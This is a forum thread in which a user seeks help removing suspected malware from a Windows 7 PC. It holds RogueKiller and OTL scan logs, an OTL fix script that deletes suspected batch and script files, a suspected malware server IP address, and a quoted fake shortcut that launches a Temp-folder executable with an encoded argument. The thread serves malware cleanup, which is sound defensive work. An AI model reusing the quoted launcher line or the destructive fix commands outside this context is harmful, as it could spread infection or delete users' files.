Author Topic: windows/SysWOW64/rundll32.exe halp me ? (Read 16890 times)

tomfullerton · « **on:** January 22, 2015, 05:22:35 PM »

Hello, I need to do a series of thorough scans since for a few days in a row I kept getting 5 processes (rundll32.exe) that would pop up a "open file with" window right after I booted. I never clicked open and eventually found out that the rundll32.exe was in C:\Windows\SysWOW64 and I also did all scans with malwarebytes, roguekiller64, microsoft essentials and haven't found much. But I also found a registry key under Computer\HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce with a filename Adobe Speed Launcher which I don't quite like and its value is set to 1421941580. Anyway, any help with a series of scans would be appreciated.
-attached roguekiller report

RogueKiller V10.2.0.0 (x64) [Jan 19 2015] by Adlice Software
mail : http://www.adlice.com/contact/
Feedback : http://forum.adlice.com
Website : http://www.adlice.com/softwares/roguekiller/
Blog : http://www.adlice.com

Operating System : Windows 7 (6.1.7601 Service Pack 1) 64 bits version
Started in : Normal mode
User : Tom Jones [Administrator]
Mode : Scan -- Date : 01/22/2015 11:25:29

¤¤¤ Processes : 0 ¤¤¤

¤¤¤ Registry : 4 ¤¤¤
[PUM.DesktopIcons] (X64) HKEY_USERS\S-1-5-21-265094073-1043058997-3425087786-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\ClassicStartMenu | {59031A47-3F72-44A7-89C5-5595FE6B30EE} : 1 -> Found
[PUM.DesktopIcons] (X86) HKEY_USERS\S-1-5-21-265094073-1043058997-3425087786-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\ClassicStartMenu | {59031A47-3F72-44A7-89C5-5595FE6B30EE} : 1 -> Found
[PUM.DesktopIcons] (X64) HKEY_USERS\S-1-5-21-265094073-1043058997-3425087786-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\NewStartPanel | {59031A47-3F72-44A7-89C5-5595FE6B30EE} : 1 -> Found
[PUM.DesktopIcons] (X86) HKEY_USERS\S-1-5-21-265094073-1043058997-3425087786-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\NewStartPanel | {59031A47-3F72-44A7-89C5-5595FE6B30EE} : 1 -> Found

¤¤¤ Tasks : 0 ¤¤¤

¤¤¤ Files : 0 ¤¤¤

¤¤¤ Hosts File : 2 ¤¤¤
[C:\Windows\System32\drivers\etc\hosts] 127.0.0.1 localhost
[C:\Windows\System32\drivers\etc\hosts] ::1 localhost

¤¤¤ Antirootkit : 0 (Driver: Loaded) ¤¤¤

¤¤¤ Web browsers : 0 ¤¤¤

¤¤¤ MBR Check : ¤¤¤
+++++ PhysicalDrive0: WDC WD1502FAEX-007BA0 ATA Device +++++
--- User ---
[MBR] 97ed83405a22741aa5222a22e681b176
[BSP] e5e13b1e52b32315f7fa08500dcdf184 : Windows Vista/7/8 MBR Code
Partition table:
0 - [XXXXXX] NTFS (0x7) [VISIBLE] Offset (sectors): 2048 | Size: 1430797 MB [Windows Vista/7/8 Bootstrap | Windows Vista/7/8 Bootloader]
User = LL1 ... OK
User = LL2 ... OK

+++++ PhysicalDrive1: INTEL SS DSC2CW120A3 SCSI Disk Device +++++
--- User ---
[MBR] b7e0dc6f6c3f2ac7a7eca2b4ee48a17c
[BSP] 1f82269f5ba8a4c12ac33d16d54131fc : Windows Vista/7/8 MBR Code
Partition table:
0 - [ACTIVE] NTFS (0x7) [VISIBLE] Offset (sectors): 2048 | Size: 100 MB [Windows Vista/7/8 Bootstrap | Windows Vista/7/8 Bootloader]
1 - [XXXXXX] NTFS (0x7) [VISIBLE] Offset (sectors): 206848 | Size: 114371 MB [Windows Vista/7/8 Bootstrap | Windows Vista/7/8 Bootloader]
User = LL1 ... OK
Error reading LL2 MBR! ([1] Incorrect function. )

============================================
RKreport_DEL_01212015_224147.log - RKreport_DEL_01212015_224200.log - RKreport_DEL_01212015_225447.log - RKreport_DEL_01212015_225932.log
RKreport_DEL_01222015_001748.log - RKreport_SCN_01212015_223814.log - RKreport_SCN_01212015_224326.log - RKreport_SCN_01212015_225859.log
RKreport_SCN_01212015_233829.log - RKreport_SCN_01222015_001707.log

Thank you!

Curson · « **Reply #1 on:** January 22, 2015, 05:57:05 PM »

Hi tomfullerton,

RogueKiller's report is clean.
rundll32.exe is a legit process. Does the pop-ups look like the one below :

If that were the case, it could be a file association issue.

Regards.

tomfullerton · « **Reply #2 on:** January 22, 2015, 11:52:08 PM »

Hello again and thank you for the reply.

First off, yes it does look like the picture you provided, but I'm very confident that this is some sort of malware.
The reason being is that this has never happened before, and there are 5 instances of said window when I just boot up. This has never happened before, and the other clue that this is not some legit program is that under the "Program/File" name I see my first name and that just can't be right.

Please advise me to run some extensive scans with other tools if you can and guide me through it.
I'd appreciate it a lot.

Thank you again!

Curson · « **Reply #3 on:** January 23, 2015, 12:22:21 AM »

Hi tomfullerton,

OK, we will investigate this more thoroughly.

1. Malwarebytes Anti-Malware

Please download Malwarebytes Anti-Malware and save it to your desktop.

Double-click on the setup file (mbam-setup.exe), then click on Run to install.
Malwarebytes will automatically open to it's Dashboard. If you have never run this version, you should see a red note at the top indicating "A scan has never been run on your system".

Click on Update Now to download the current database definitions, then click the Scan Now button.
If you have run this version before, you should see a green note at the top indicating "Your system is fully protected".

The THREAT SCAN will automatically begin.
When the scan has completed, the results will be displayed. Click on Quarantine All, then click on Apply Actions.

To complete any actions taken you will be prompted to restart your computer...click on Yes.
Failure to reboot normally will prevent Malwarebytes from removing all the malware.

After rebooting the computer, copy and past the mbam.log in your next reply.

To retrieve the scan log information (Method 1) :

Open Malwarebytes Anti-Malware.
Click the History Tab at the top and select Application Logs.
Select the box next to Scan Log. Choose the most current scan.
Click the Export button and save the log as a .txt file on your Desktop or another location.
Be sure to post the complete log to include the top portion which shows MBAM's database version and your operating system.

To retrieve the scan log information (Method 2) :

Open Malwarebytes Anti-Malware.
Click the Scan Tab at the top.
Click the View detailed log link on the right.
Click the Export button and save the log as a .txt file on your Desktop or another location.
Be sure to post the complete log to include the top portion which shows MBAM's database version and your operating system.

Alternatively, logs are named by the date of scan in the following format: mbam-log-yyyy-mm-dd and automatically saved to the following locations:

-- XP: C:\Documents and Settings\<Username>\Application Data\Malwarebytes\Malwarebytes Anti-Malware\Logs\mbam-log-yyyy-mm-dd
-- Vista, Windows 7/8: C:\ProgramData\Malwarebytes\Malwarebytes Anti-Malware\Logs\mbam-log-yyyy-mm-dd

2. OTL

Please download OTL by OldTimer and save the file to your desktop.

Double-click on the setup file (OTL.exe)and select Run as Administrator to start the tool.
Make sure that Scan All Users, LOP check and Purity check are ticked.
For 64-bit systems only - make sure that Include 64-bit option is also ticked.
Sections Processes, Modules, Services, Drivers, Standard Registry are set to Use Safelist.
Section Extra Registry is also set to Use Safelist.

Push Run Scan and wait patiently.
Two notepad windows will be opened after this run: OTL.txt (maximized) and Extras.txt (minimized).

Please include the content of both logfiles in your next reply.

Regards.

tomfullerton · « **Reply #4 on:** January 23, 2015, 01:42:57 AM »

Hello again,

I have attached all 3 log files after scans, and also I've found a "FILE" under C:\Users named "Tom" and I've attached it.
It looks super suspicious I think. I scanned it with VirusTotal but it doesn't seem to find anything wrong with it, nonetheless the results are here: https://www.virustotal.com/en/file/60c32e7ba31fd30810d23222932a76129a7aa13347ece280c3a89f785c72d997/analysis/1421971881/
I proceeded to open it and it seems to be a text file with some code on it that I think is dead on some sort of malware trying to connect to some ip address that's not even mine: 69.162.120.131

NOTE: I changed the 'file' extension to .txt because the forum wouldn't let me upload a no-extension file.

Please advise.

Thank you!

tomfullerton · « **Reply #5 on:** January 23, 2015, 02:10:22 AM »

Okay now this is probably bad.

Another shortcut to a .exe file appeared on my desktop under the fake name "VLC Media Player" which I obviously have never installed since I hate that player.
The shortcut's target is "C:\Users\Tom Jones\AppData\Local\Temp\bcdcabfdbbfi.exe" C:\Users\TOMJO~1\AppData\Local\Temp\bcdcabfdbbfi.exe 7-5-1-8-9-0-7-5-3-1-1 KEtIPDQxMjAyHy5MUEFIQEQ2Kx0uTT5PVkdJS0I/OjAfKD9IS0tJPTguNjcrGy47QEQ2Kx0uT0tKQ006VFhEQTwwMCswGCZTPk1TRFFYUFFENGhtb205LihuZGpt

I also scanned this with VirusTotal and these are the results: https://www.virustotal.com/en/file/f34683038e2d3a0cc4a74d91c199f00d3896b80aac04edbcef6191f3bd778b65/analysis/1421975128/

Someone gotta help me get rid of this stuff that apparently none of the tools I've used so far has detected anything...

Curson · « **Reply #6 on:** January 23, 2015, 02:11:04 PM »

Hi tomfullerton,

1. Run OTL Script

Right-click on OTL.exe and select Run as Administrator.
Copy and Paste the following code into the textbox.

Quote

:OTL
IE - HKU\S-1-5-21-265094073-1043058997-3425087786-1000\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page Redirect Cache AcceptLangs = en-us
IE - HKU\S-1-5-21-265094073-1043058997-3425087786-1000\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page Redirect Cache_TIMESTAMP = CA 23 D8 6A EC ED CD 01 [binary data]
CHR - plugin: Conduit Chrome Plugin (Enabled) = C:\Users\Tom Jones\AppData\Local\Google\Chrome\User Data\Default\Extensions\ljfhnpbhhmmhdamdbpmajlonoecdobln\10.13.20.29_0\plugins/ConduitChromeApiPlugin.dll
CHR - plugin: Conduit Radio Plugin (Enabled) = C:\Users\Tom Jones\AppData\Local\Google\Chrome\User Data\Default\Extensions\ljfhnpbhhmmhdamdbpmajlonoecdobln\10.13.20.29_0\plugins/np-cwmp.dll

:files
C:\Users\Tom Jones\AppData\Roaming\Windaws.bat
C:\Users\Tom Jones\AppData\Roaming\*.vbs
C:\Users\*.vbs

:commands
[emptytemp]

Then click the Run Fix button at the top.
OTL may ask to reboot the machine. Please do so if asked.
The report should appear in Notepad after the reboot.Copy and Paste that report in your next reply.

2. New OTL Scan

Right-click on OTL.exe and select Run as Administrator.
Copy and Paste the following code into the textbox :

Quote

C:\Users\*.vbs /S
C:\Users\*.bat /S

Push Run Scan and wait patiently.
Two notepad windows will be opened after this run: OTL.txt (maximized) and Extras.txt (minimized).

Please include the content of OTL.txt in your next reply.

3. New MalwareBytes Scan

Please do a full scan with Malwarebytes Anti-Malware.
When the scan has completed, the results will be displayed. Click on Quarantine All, then click on Apply Actions.

To complete any actions taken you will be prompted to restart your computer...click on Yes.
Failure to reboot normally will prevent Malwarebytes from removing all the malware.

After rebooting the computer, copy and past the mbam.log in your next reply.

Regards.

tomfullerton · « **Reply #7 on:** January 23, 2015, 09:19:44 PM »

Sorry I have to break my post in 2-3 steps because of length.

Anyways here they are:

1. The OTL fix produced this report:

All processes killed
========== OTL ==========
HKU\S-1-5-21-265094073-1043058997-3425087786-1000\SOFTWARE\Microsoft\Internet Explorer\Main\\Start Page Redirect Cache AcceptLangs| /E : value set successfully!
HKU\S-1-5-21-265094073-1043058997-3425087786-1000\SOFTWARE\Microsoft\Internet Explorer\Main\\Start Page Redirect Cache_TIMESTAMP| /E : value set successfully!
File C:\Users\Tom Jones\AppData\Local\Google\Chrome\User Data\Default\Extensions\ljfhnpbhhmmhdamdbpmajlonoecdobln\10.13.20.29_0\plugins/ConduitChromeApiPlugin.dll not found.
File C:\Users\Tom Jones\AppData\Local\Google\Chrome\User Data\Default\Extensions\ljfhnpbhhmmhdamdbpmajlonoecdobln\10.13.20.29_0\plugins/np-cwmp.dll not found.
========== FILES ==========
File\Folder C:\Users\Tom Jones\AppData\Roaming\Windaws.bat not found.
File\Folder C:\Users\Tom Jones\AppData\Roaming\*.vbs not found.
File\Folder C:\Users\*.vbs not found.
========== COMMANDS ==========

[EMPTYTEMP]

User: All Users

User: Default
->Temp folder emptied: 0 bytes
->Temporary Internet Files folder emptied: 0 bytes

User: Default User
->Temp folder emptied: 0 bytes
->Temporary Internet Files folder emptied: 0 bytes

User: Public

User: Tom Jones
->Temp folder emptied: 1421 bytes
->Temporary Internet Files folder emptied: 451 bytes
->Java cache emptied: 0 bytes
->Google Chrome cache emptied: 52902668 bytes
->Apple Safari cache emptied: 0 bytes
->Flash cache emptied: 0 bytes

User: Tom%20Jones

%systemdrive% .tmp files removed: 0 bytes
%systemroot% .tmp files removed: 0 bytes
%systemroot%\System32 .tmp files removed: 0 bytes
%systemroot%\System32 (64bit) .tmp files removed: 0 bytes
%systemroot%\System32\drivers .tmp files removed: 0 bytes
Windows Temp folder emptied: 3066 bytes
%systemroot%\sysnative\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files folder emptied: 0 bytes
%systemroot%\sysnative\config\systemprofile\AppData\LocalLow\Sun\Java\Deployment folder emptied: 0 bytes
RecycleBin emptied: 0 bytes

Total Files Cleaned = 50.00 mb

OTL by OldTimer - Version 3.2.69.0 log created on 01232015_124516

Files\Folders moved on Reboot...
C:\Users\Tom Jones\AppData\Local\Temp\FXSAPIDebugLogFile.txt moved successfully.

PendingFileRenameOperations files...

Registry entries deleted on Reboot...

--------------------------------------------------------------------------------------------------------

2. New OTL scan produced:

OTL logfile created on: 1/23/2015 1:10:34 PM - Run 2
OTL by OldTimer - Version 3.2.69.0 Folder = C:\Users\Tom Jones\Downloads
64bit- Ultimate Edition Service Pack 1 (Version = 6.1.7601) - Type = NTWorkstation
Internet Explorer (Version = 9.11.9600.17501)
Locale: 00000409 | Country: United States | Language: ENU | Date Format: M/d/yyyy

15.97 Gb Total Physical Memory | 12.64 Gb Available Physical Memory | 79.17% Memory free
31.93 Gb Paging File | 27.89 Gb Available in Paging File | 87.33% Paging File free
Paging file location(s): ?:\pagefile.sys [binary data]

%SystemDrive% = C: | %SystemRoot% = C:\Windows | %ProgramFiles% = C:\Program Files (x86)
Drive C: | 111.69 Gb Total Space | 25.72 Gb Free Space | 23.03% Space Free | Partition Type: NTFS
Drive E: | 1397.26 Gb Total Space | 1099.73 Gb Free Space | 78.71% Space Free | Partition Type: NTFS

Computer Name: SSPC | User Name: Tom Jones | Logged in as Administrator.
Boot Mode: Normal | Scan Mode: All users | Include 64bit Scans
Company Name Whitelist: Off | Skip Microsoft Files: Off | No Company Name Whitelist: On | File Age = 30 Days

========== Processes (SafeList) ==========

PRC - [2015/01/23 12:34:23 | 000,602,112 | ---- | M] (OldTimer Tools) -- C:\Users\Tom Jones\Downloads\OTL.exe
PRC - [2014/12/03 01:31:16 | 000,081,088 | ---- | M] (Adobe Systems Incorporated) -- C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
PRC - [2014/05/19 05:46:34 | 000,465,064 | ---- | M] () -- E:\Program Files (x86)\MSI Afterburner\MSIAfterburner.exe
PRC - [2013/10/23 17:39:14 | 001,017,224 | ---- | M] (Flux Software LLC) -- C:\Users\Tom Jones\AppData\Local\FluxSoftware\Flux\flux.exe
PRC - [2013/07/19 16:28:58 | 000,557,968 | ---- | M] (Cisco Systems, Inc.) -- C:\Program Files (x86)\Cisco\Cisco AnyConnect Secure Mobility Client\vpnagent.exe
PRC - [2012/11/18 12:10:22 | 001,634,304 | ---- | M] (Don HO don.h@free.fr) -- E:\Program Files (x86)\Notepad++\notepad++.exe
PRC - [2010/12/02 09:15:14 | 000,915,584 | ---- | M] () -- C:\Program Files (x86)\ASUS\AAHM\1.00.14\aaHMSvc.exe
PRC - [2010/11/03 16:30:14 | 000,918,144 | ---- | M] () -- C:\Program Files (x86)\ASUS\AXSP\1.00.13\atkexComSvc.exe
PRC - [2010/10/21 16:52:26 | 000,586,880 | ---- | M] () -- C:\Program Files (x86)\ASUS\AsSysCtrlService\1.00.11\AsSysCtrlService.exe
PRC - [2010/10/05 08:32:58 | 001,811,800 | ---- | M] (Logitech(c)) -- C:\Program Files (x86)\Logitech\G35\G35.exe
PRC - [2009/08/17 10:27:36 | 000,995,328 | ---- | M] (NETGEAR) -- C:\Program Files (x86)\NETGEAR\WPN111\WPN111.exe

========== Modules (No Company Name) ==========

MOD - [2015/01/08 19:35:54 | 009,009,480 | ---- | M] () -- C:\Users\Tom Jones\AppData\Local\Google\Chrome\Application\39.0.2171.99\pdf.dll
MOD - [2015/01/08 19:35:51 | 001,077,064 | ---- | M] () -- C:\Users\Tom Jones\AppData\Local\Google\Chrome\Application\39.0.2171.99\libglesv2.dll
MOD - [2015/01/08 19:35:49 | 000,211,272 | ---- | M] () -- C:\Users\Tom Jones\AppData\Local\Google\Chrome\Application\39.0.2171.99\libegl.dll
MOD - [2015/01/08 19:35:48 | 001,677,128 | ---- | M] () -- C:\Users\Tom Jones\AppData\Local\Google\Chrome\Application\39.0.2171.99\ffmpegsumo.dll
MOD - [2014/05/19 05:46:34 | 000,465,064 | ---- | M] () -- E:\Program Files (x86)\MSI Afterburner\MSIAfterburner.exe
MOD - [2014/04/15 08:31:52 | 000,638,976 | ---- | M] () -- E:\Program Files (x86)\MSI Afterburner\RTHAL.dll
MOD - [2014/04/15 08:31:28 | 000,216,064 | ---- | M] () -- E:\Program Files (x86)\MSI Afterburner\RTCore.dll
MOD - [2014/04/15 08:31:20 | 000,127,488 | ---- | M] () -- E:\Program Files (x86)\MSI Afterburner\RTUI.dll
MOD - [2014/04/15 08:31:16 | 000,071,680 | ---- | M] () -- E:\Program Files (x86)\MSI Afterburner\RTMUI.dll
MOD - [2014/04/15 08:31:10 | 000,056,832 | ---- | M] () -- E:\Program Files (x86)\MSI Afterburner\RTFC.dll
MOD - [2013/11/30 10:14:10 | 000,204,800 | ---- | M] () -- E:\Program Files (x86)\Notepad++\plugins\ComparePlugin.dll
MOD - [2011/09/21 15:46:28 | 001,673,728 | ---- | M] () -- E:\Program Files (x86)\Notepad++\plugins\NppFTP.dll
MOD - [2011/07/18 16:07:28 | 000,014,336 | ---- | M] () -- E:\Program Files (x86)\Notepad++\plugins\NppExport.dll

========== Services (SafeList) ==========

SRV:64bit: - [2014/11/21 21:35:29 | 000,114,688 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\IEEtwCollector.exe -- (IEEtwCollectorService)
SRV:64bit: - [2014/08/22 14:14:34 | 000,368,624 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Program Files\Microsoft Security Client\NisSrv.exe -- (NisSrv)
SRV:64bit: - [2014/08/22 14:14:34 | 000,023,784 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Program Files\Microsoft Security Client\MsMpEng.exe -- (MsMpSvc)
SRV:64bit: - [2013/10/04 23:58:24 | 000,087,728 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Program Files\Microsoft Visual Studio 12.0\Common7\Packages\Debugger\Services\VsEtwService.exe -- (VsEtwService120)
SRV:64bit: - [2013/05/27 00:50:47 | 001,011,712 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Program Files\Windows Defender\MpSvc.dll -- (WinDefend)
SRV:64bit: - [2011/06/29 09:51:26 | 000,171,688 | ---- | M] (Intel Corporation) [Auto | Running] -- C:\Windows\SysNative\IPROSetMonitor.exe -- (Intel(R)
SRV:64bit: - [2010/02/02 18:03:05 | 000,015,768 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Program Files\Windows Identity Foundation\v3.5\c2wtshost.exe -- (c2wts)
SRV:64bit: - [2009/07/13 20:40:01 | 000,193,536 | ---- | M] (Microsoft Corporation) [Disabled | Stopped] -- C:\Windows\SysNative\appmgmts.dll -- (AppMgmt)
SRV - [2014/12/19 18:38:02 | 000,833,728 | ---- | M] (Valve Corporation) [On_Demand | Stopped] -- C:\Program Files (x86)\Common Files\Steam\SteamService.exe -- (Steam Client Service)
SRV - [2014/12/11 10:30:48 | 000,315,496 | R--- | M] (Skype Technologies) [Auto | Stopped] -- E:\Program Files\Skype\Updater\Updater.exe -- (SkypeUpdate)
SRV - [2014/12/03 01:31:16 | 000,081,088 | ---- | M] (Adobe Systems Incorporated) [Auto | Running] -- C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe -- (AdobeARMservice)
SRV - [2014/04/11 23:08:08 | 000,103,608 | ---- | M] (Microsoft Corporation) [Auto | Stopped] -- C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -- (clr_optimization_v4.0.30319_32)
SRV - [2014/03/20 17:49:18 | 000,067,224 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorsvw.exe -- (clr_optimization_v2.0.50727_32)
SRV - [2013/08/22 04:21:36 | 000,119,808 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Program Files (x86)\Windows Kits\8.1\Testing\Runtimes\TAEF\Wex.Services.exe -- (Te.Service)
SRV - [2013/08/22 03:55:00 | 000,142,336 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Program Files (x86)\Windows Kits\8.1\App Certification Kit\fussvc.exe -- (fussvc)
SRV - [2013/07/19 16:28:58 | 000,557,968 | ---- | M] (Cisco Systems, Inc.) [Auto | Running] -- C:\Program Files (x86)\Cisco\Cisco AnyConnect Secure Mobility Client\vpnagent.exe -- (vpnagent)
SRV - [2010/12/02 09:15:14 | 000,915,584 | ---- | M] () [Auto | Running] -- C:\Program Files (x86)\ASUS\AAHM\1.00.14\aaHMSvc.exe -- (asHmComSvc)
SRV - [2010/11/03 16:30:14 | 000,918,144 | ---- | M] () [Auto | Running] -- C:\Program Files (x86)\ASUS\AXSP\1.00.13\atkexComSvc.exe -- (asComSvc)
SRV - [2010/10/21 16:52:26 | 000,586,880 | ---- | M] () [Auto | Running] -- C:\Program Files (x86)\ASUS\AsSysCtrlService\1.00.11\AsSysCtrlService.exe -- (AsSysCtrlService)

tomfullerton · « **Reply #8 on:** January 23, 2015, 09:21:00 PM »

----------******************Continuing from the other post *********-----------

========== Driver Services (SafeList) ==========

DRV:64bit: - [2014/11/18 15:02:16 | 000,084,992 | ---- | M] (Intel Corporation) [Kernel | Auto | Running] -- C:\Windows\SysNative\drivers\IntelHaxm.sys -- (IntelHaxm)
DRV:64bit: - [2014/07/17 17:05:06 | 000,125,584 | ---- | M] (Microsoft Corporation) [Kernel | Auto | Running] -- C:\Windows\SysNative\drivers\NisDrvWFP.sys -- (NisDrv)
DRV:64bit: - [2014/07/14 12:09:16 | 000,013,568 | ---- | M] (Resplendence Software Projects Sp.) [File_System | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\rspCrash64.sys -- (rspCrash)
DRV:64bit: - [2014/03/31 11:42:44 | 000,040,392 | ---- | M] (NVIDIA Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\nvvad64v.sys -- (nvvad_WaveExtensible)
DRV:64bit: - [2014/03/26 18:00:14 | 000,141,600 | ---- | M] (Oracle Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\VBoxNetAdp.sys -- (VBoxNetAdp)
DRV:64bit: - [2013/10/01 21:22:20 | 000,056,832 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\TsUsbFlt.sys -- (TsUsbFlt)
DRV:64bit: - [2013/07/19 16:12:38 | 000,052,080 | ---- | M] (Cisco Systems, Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\vpnva64-6.sys -- (vpnva)
DRV:64bit: - [2013/07/19 16:10:16 | 000,112,080 | R--- | M] (Cisco Systems, Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\acsock64.sys -- (acsock)
DRV:64bit: - [2013/01/22 17:08:56 | 000,004,608 | ---- | M] (RealVNC Ltd.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\vncmirror.sys -- (vncmirror)
DRV:64bit: - [2012/12/13 14:50:36 | 000,054,784 | ---- | M] (Apple, Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\usbaapl64.sys -- (USBAAPL64)
DRV:64bit: - [2012/08/21 12:01:20 | 000,033,240 | ---- | M] (GEAR Software Inc.) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\GEARAspiWDM.sys -- (GEARAspiWDM)
DRV:64bit: - [2012/06/07 10:17:04 | 000,319,336 | ---- | M] (Marvell Semiconductor, Inc.) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\mv91xx.sys -- (mv91xx)
DRV:64bit: - [2012/05/30 21:10:15 | 000,121,416 | ---- | M] (MotioninJoy) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\MijXfilt.sys -- (MotioninJoyXFilter)
DRV:64bit: - [2012/03/01 01:46:16 | 000,023,408 | ---- | M] (Microsoft Corporation) [Recognizer | Boot | Unknown] -- C:\Windows\SysNative\drivers\fs_rec.sys -- (Fs_Rec)
DRV:64bit: - [2012/02/09 01:06:36 | 000,125,376 | ---- | M] (Power Software Ltd) [Kernel | System | Running] -- C:\Windows\SysNative\drivers\scdemu.sys -- (SCDEmu)
DRV:64bit: - [2011/07/20 12:58:22 | 000,044,032 | ---- | M] (Research in Motion Ltd) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\RimSerial_AMD64.sys -- (RimVSerPort)
DRV:64bit: - [2011/07/20 08:37:56 | 000,342,704 | ---- | M] (Intel Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\e1c62x64.sys -- (e1cexpress)
DRV:64bit: - [2011/06/21 09:26:40 | 000,336,048 | ---- | M] (Intel Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\e1q62x64.sys -- (e1qexpress)
DRV:64bit: - [2011/04/15 10:08:26 | 012,228,128 | ---- | M] (Intel Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\igdkmd64.sys -- (igfx)
DRV:64bit: - [2011/03/11 01:41:12 | 000,107,904 | ---- | M] (Advanced Micro Devices) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\amdsata.sys -- (amdsata)
DRV:64bit: - [2011/03/11 01:41:12 | 000,027,008 | ---- | M] (Advanced Micro Devices) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\amdxata.sys -- (amdxata)
DRV:64bit: - [2011/01/19 17:47:18 | 000,021,992 | ---- | M] (CPUID) [Kernel | Auto | Running] -- C:\Windows\SysNative\drivers\cpuz135_x64.sys -- (cpuz135)
DRV:64bit: - [2010/12/10 12:50:36 | 000,181,248 | ---- | M] (Renesas Electronics Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\nusb3xhc.sys -- (nusb3xhc)
DRV:64bit: - [2010/12/10 12:50:36 | 000,080,384 | ---- | M] (Renesas Electronics Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\nusb3hub.sys -- (nusb3hub)
DRV:64bit: - [2010/11/20 22:24:43 | 000,020,992 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\rdpvideominiport.sys -- (RdpVideoMiniport)
DRV:64bit: - [2010/11/20 22:23:48 | 000,117,248 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\tsusbhub.sys -- (tsusbhub)
DRV:64bit: - [2010/11/20 22:23:48 | 000,088,960 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\Synth3dVsc.sys -- (Synth3dVsc)
DRV:64bit: - [2010/11/20 22:23:48 | 000,071,168 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\dmvsc.sys -- (dmvsc)
DRV:64bit: - [2010/11/20 22:23:48 | 000,034,816 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\terminpt.sys -- (terminpt)
DRV:64bit: - [2010/11/20 22:23:47 | 000,078,720 | ---- | M] (Hewlett-Packard Company) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\HpSAMD.sys -- (HpSAMD)
DRV:64bit: - [2010/11/20 22:23:47 | 000,031,232 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\TsUsbGD.sys -- (TsUsbGD)
DRV:64bit: - [2010/10/15 00:28:16 | 000,317,440 | ---- | M] (Intel(R) Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\IntcDAud.sys -- (IntcDAud)
DRV:64bit: - [2010/09/29 10:34:50 | 000,377,176 | ---- | M] (Logitech) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\ladfSBVMamd64.sys -- (LADF_SBVM)
DRV:64bit: - [2010/09/29 10:34:48 | 000,062,168 | ---- | M] (Logitech) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\ladfDHP2amd64.sys -- (LADF_DHP2)
DRV:64bit: - [2010/08/10 16:29:14 | 000,120,920 | ---- | M] (JMicron Technology Corp.) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\jraid.sys -- (JRAID)
DRV:64bit: - [2010/07/08 03:32:19 | 000,050,056 | ---- | M] (Saitek) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\SaiBus.sys -- (SaiNtBus)
DRV:64bit: - [2010/07/08 03:32:19 | 000,022,792 | ---- | M] (Saitek) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\SaiMini.sys -- (SaiMini)
DRV:64bit: - [2010/07/08 03:32:14 | 000,172,040 | ---- | M] (Saitek) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\SaiK0836.sys -- (SaiK0836)
DRV:64bit: - [2010/02/08 07:32:00 | 000,014,992 | ---- | M] (Cisco Systems, Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\CVirtA64.sys -- (CVirtA)
